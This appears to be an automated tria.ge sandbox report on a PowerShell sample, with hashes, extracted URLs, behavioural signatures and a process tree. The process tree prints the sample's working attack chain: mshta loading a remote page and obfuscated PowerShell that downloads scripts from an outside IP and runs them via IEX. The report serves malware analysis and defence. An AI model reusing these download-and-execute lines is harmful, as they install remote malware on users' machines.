Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18/11/2024, 15:47
Static task
static1
Behavioral task
behavioral1
Sample
prueba.ps1
Resource
win7-20240903-en
General
-
Target
prueba.ps1
-
Size
124B
-
MD5
6542fcabb69f2e45e5abb6ef369d6b4b
-
SHA1
a9e758873a6c57d87b7e3bf02cfc04be6959d59b
-
SHA256
fd4dd13239fcd0e3171711951768b399b1b2210af3e6b4f7cc1c0a594bff7133
-
SHA512
6f9a75d4e17909c0dea87683bec1286964b8b21db927650c72db8b33df37b07a16b84bd56db42a5055e20c1895821b541467812dc03d5cefb4a144cebb2afb26
Malware Config
Extracted
http://185.147.124.40/Capcha.html
Extracted
http://185.147.124.40/x/8.png
Extracted
http://185.147.124.40/x/4.png
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2164 mshta.exe 5 1616 powershell.exe 6 2924 powershell.exe -
pid Process 2508 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 1832 ipconfig.exe 112 ipconfig.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2508 powershell.exe 2924 powershell.exe 1616 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2508 wrote to memory of 2164 2508 powershell.exe 31 PID 2508 wrote to memory of 2164 2508 powershell.exe 31 PID 2508 wrote to memory of 2164 2508 powershell.exe 31 PID 2164 wrote to memory of 1616 2164 mshta.exe 33 PID 2164 wrote to memory of 1616 2164 mshta.exe 33 PID 2164 wrote to memory of 1616 2164 mshta.exe 33 PID 2164 wrote to memory of 2924 2164 mshta.exe 35 PID 2164 wrote to memory of 2924 2164 mshta.exe 35 PID 2164 wrote to memory of 2924 2164 mshta.exe 35 PID 2924 wrote to memory of 1832 2924 powershell.exe 37 PID 2924 wrote to memory of 1832 2924 powershell.exe 37 PID 2924 wrote to memory of 1832 2924 powershell.exe 37 PID 1616 wrote to memory of 112 1616 powershell.exe 38 PID 1616 wrote to memory of 112 1616 powershell.exe 38 PID 1616 wrote to memory of 112 1616 powershell.exe 38
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\prueba.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://185.147.124.40/Capcha.html2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://185.147.124.40/x/8.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns4⤵
- Gathers network information
PID:112
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://185.147.124.40/x/4.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /flushdns4⤵
- Gathers network information
PID:1832
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51e97cdeb650179fea1d1dd7e98f2cd27
SHA1a9ca893e9391ea8e6f8f1a0f9dea31c8cfd7442f
SHA25600f543df333ee72ba371f4df90e32ef9fc14327352823c8e30eec4c2e00604ae
SHA512b938861dbf04dc46b2ac673be270de2c98ea02b77abc3dba617ea72c567abdf73efaf77bbaf8c91cee92ea982ed55d9b423bf45340fab7764f807503ed16920c